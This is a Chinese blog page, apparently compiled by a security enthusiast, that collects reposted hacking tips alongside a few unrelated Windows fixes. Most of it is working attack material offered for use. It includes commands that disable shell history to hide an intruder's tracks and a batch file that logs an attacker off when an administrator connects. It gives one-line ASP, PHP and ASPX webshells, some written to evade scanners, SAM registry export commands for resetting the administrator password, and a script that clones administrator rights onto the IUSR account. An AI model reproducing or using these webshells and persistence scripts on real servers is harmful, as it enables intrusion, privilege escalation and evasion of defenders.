转自:http://www.im286.com/thread-3742085-1-1.html
前段时间单位的服务器上被人上传了一个.NET木马,,这次让我认识到以前没有见过的上传木马的招数,,同时也找出一些对策,,咱落伍论坛很多都有服务器的,,就分享出来给大家吧。
.net木马目前很强的,,下载地址:http://www.rootkit.net.cn/article.asp?id=132 (你可以上传到你的服务器上看看对你的系统都能做什么)
此木马是一个.NET程序制作,如果你的服务器支持.NET那就要注意了,,进入木马有个功能叫:IIS Spy,点击以后可以看到所有站点所在的物理路径。以前有很多人提出过,但一直没有人给解决的答案。。
防御方法:
一些我常用到的猥琐的tips,猥琐流使用,非猥琐流请飘过
1,登录ssh之后不记录history
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
2. sed的一些邪恶用法
邪恶的替换到登录的IP和日志里的访问IP
作者:逗号
- -! 来了TOOLS 这么久还没写过东西现在给大家贡献点东西
当你在渗透中挂机嗅探的时候,如果管理员上来发现就不好了所以有了这个bat 的用处
检测管理员上线注销自已的 bat
copy 保存为 xx.bat
@echo off
:check
choice /C YN /T 10 /D Y
quser | find "#16" && del xx.bat | logoff
goto check
说明一下
#16 每次运行这个 bat 的时候先quser 一下,看当前的会话id 是多少,然后加1 每连接一次就会加1
用户名 会话名 ID 状态 空闲时间 登录时间
administrator rdp-tcp#22 2 运行中 . 2009-4-16 19:24
你要把这个给改成 #23 就可以了 然后下一个连接进来的时候就会注销自已
哪位牛帮忙改一下,判断 如果 比 rdp-tcp#22 大的连接进来的话就注销自已
choice /C YN /T 10 /D Y
/T 10 是 10 秒一检测 这样是为了不太占CPU
by dh
为了渗透的方便,顺便帖上一个很淫的人写的一个 bat 方便大家
嗅探中当机的一点点启示
by chong
很多朋友在嗅探的时候肉猪一不小心就挂了.那个后悔啊.....
当然 你要选择尽量少的服务来嗅.比如你要嗅目标的1433及80.那你嗅其他的就没用罗.
这样会大大的减少当机的可能性.如果看到丢包率超过10%就要注意啦. 赶紧停掉,看看那里没设置好吧.
如果还是不小心挂了呢.
没事.这里为您准备了一个BAT 在开嗅的时候运行它就行了哦.
======start=========
:ping
choice /C YN /T 120 /D Y
ping g.cn
IF ERRORLEVEL 1 GOTO reboot
IF ERRORLEVEL 0 GOTO ping
:reboot
shutdown /r /t 0
======end=========
这里的g.cn你可以设置为网关的IP或你的IP
如果能ping通的话就继续ping 如果不通的话就认为当机了 (当然.你要事先测试下)
那.就重启罗. 或自己写一些语句 像结束cain等.自由发挥
作者:kook1991
得到客户端主机名:
select host_name();
得到服务端主机名:
select @@servername;
结果一样就极有可能未分离,结果不一样就是分离的
asp一句话
<%execute(request("1"))%>
php一句话
<?php eval($_POST[1]);?>
aspx一句话
<script language="C#" runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>
可以躲过雷客图的一句话。
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>
不用'<,>'的asp一句话
<script language=VBScript runat=server>execute request("1")</script>
不用双引号的一句话。
<%eval request(chr(35))%>
SA权限的注射点的时候,我们能够使用系统自带的一些命令来读取注册表键信息.
sa默认是SYSTEM权限,可以读sam键.
regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 win2K
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg win2003
读出来后,我们就可以直接更改管理员密码进行登陆了:
net user administrator test
用administrator登陆.
用完机器后
reg import c:\test.reg
根本不用克隆.
但是要注意,一定要找到对应的sid.
HKEY_CURRENT_USER\Software\ORL\WinVNC3
HKCU\Software\ORL\WinVNC3\Password
其实就是注册表里复制管理员权限到普通用户那个操作,不过毕竟批处理容易在cmdshell里实现,贴出来吧
echo off
setlocal enabledelayedexpansion
echo %computername%
echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%
rem unicode ->ascii
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem find IUSR_%computername% 的对应id
for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b
del /q "%windir%\..\2.reg"
rem export administrator register
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem replace 1fx->iusr_id
for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (
for /f "tokens=*" %%j in ("%%i") do (
set TMP=%%j
set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"
echo !TMP!>>%windir%\..\1.reg
)
)
regedit /s %windir%\..\1.reg
del /q %windir%\..\1.reg
del /q %windir%\..\2.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
del /q "%windir%\..\1.reg"
net user IUSR_%computername% 12345678
克隆出来的用户名是固定的,随便变换的话要改代码
黑客利用来攻击网站和企业服务器的大多数漏洞,通常是由于常见的和众所周知的编程错误所造成的。
本周一,一个由35个高知名度机构组成的组织对外公布了一份列有25个这种最严重编程错误的清单,这个组织的成员包括微软、赛门铁克、美国国土安全部(DHS)和国家安全局信息保障司。这个首创项目由SANS研究所和MITRE公司负责协调开展。MITRE公司是联邦政府资助的一个研发中心。
Paul Kurtz是Good Harbor咨询公司的一个合伙人,他还是“美国国家网络保护战略文件”的主要作者之一。Kurtz把这份清单称作“令人难以置信的、重要的发展。 ”
在周一上午举行的新闻发布会上,Paul Kurtz表示,不幸的是,安全界居然过了这么久才拿出了一份文件,承认常见的和长期存在的编码错误。
SANS的官员在一份声明中表示,公布这份不寻常文件的目的,是让人们把注意力集中在不安全的软件开发实践和避免这些做法的途径上。公布这份清单的目的是给软件买家、开发人员和培训项目提供一个工具,他们可以用来识别那些已知的、将会构成严重安全风险的编程错误。展望未来,这份清单将在必要的时候进行调整,以增加任何新出现的或特别危险的代码错误。
这份清单分为三大类,涵盖了各种熟知的问题。其中9个安全错误属于“程序部件之间不安全互动”。9个错误被视为“危险的资源管理”错误,其余7个错误被称为“有很多漏洞的防御”问题。
这些编码错误是根据它们发生的频率和它们所构成的安全风险的严重性评出的。
25大软件编程错误
1.输入验证不当
2.不适当的编码或输出逃逸
3. SQL查询结构维护失败( SQL注入)
4.网页结构维护失败(跨站点脚本攻击)
5.操作系统指令结构维护失败(操作系统命令注入)
6.明文传输敏感信息
7.伪造跨站点请求
8.紊乱情况
9.错误信息泄露
10.内存缓冲区边界限制失败
11.外部控制临界状态数据
12.外部控制文件名或路径
13.不可信的搜索路径
14.代码生成控制失败(代码注入)
15.代码下载没有完整性检查
16.关闭或释放资源不当
17.初始化不当
18.计算不正确
19.防御出现多个漏洞
20.使用失效的或危险的加密算法
21.硬编码(Hard-coded)密码
22.为关键资源赋予不安全的操作权限
23.使用不充分的随机值
24.采用不必要的权限进行执行
25.把服务器端的安全放在客户端执行
regsvr32 jscript.dll regsvr32 vbscript.dll 解决IE问题
regsvr32 jscript.dll
regsvr32 vbscript.dll
作用:
1、跟上面讲的修复IE浏览器方法配合使用(可以不配),可以很好的解决浏览某些网页无法正常显示和功能不正常,如:
a.不显示某些验证码
b.不显示某些动态图片
c.不显示某些论坛的帖子列表
d.论坛快速跳转功能无用
e.论坛发贴时按Ctrl+Enter提交无反应
2、修复个别窗口空白,如XP的‘搜索’功能的搜索助理操作面板空白、系统还原页面空白和用户帐户页面空白等。(可修复把握度100%)
3、解决windows media player 9或以上版本打开时提示‘出现内部应用程序错误’。(可修复把握度100%)
4、可以修复win 2000的‘添加/删除程序’打开后一片空白。(可修复把握度99%)
5、解决win 2000以WEB方式查看Program Files文件夹和Winnt文件夹时看不到任何文件,以及‘控制面板’的图标跑到左边去的问题。
6、解决网页上网际快车的右键菜单功能无法使用。
在网站中,当右键点某个‘下载连接’时,会弹出菜单,选择‘使用网际快车下载’会再弹出FLASHGET的下载任务页面,如果发现该功能无反应,那就可能是这个原因:原来这项菜单是调用了FLASHGET目录下的jc_link.htm文件,这个文件是用VB语言编写的,所以其作用丢失是动态连接库vbscript.dll没有注册和调用到。
删除qq目录下SafeBase下的tsfsres.dat.
同时在SafeBase新同名文件tsfsres.dat并设置属性为只读。
经测试。可以正常使用。
一下迅雷就会有这文件
是因为迅雷的文件夹内 丢失了文件Thunder Network\Thunder\Profiles\Username
最有效办法是卸了重装
也可以采用下面的办法:
在Thunder Network\Thunder\Profiles\Username新建一个叫username的文件夹 虽然BlogCID.dat不会出现在这个文件夹里 只是存在了 迅雷的文件夹里
但就不会再出现在桌面上了 就这么OK了
姓名:Chinadu
性别:Man
职业:网络安全从业者
E-mail:imcto#msn.cn
近期评论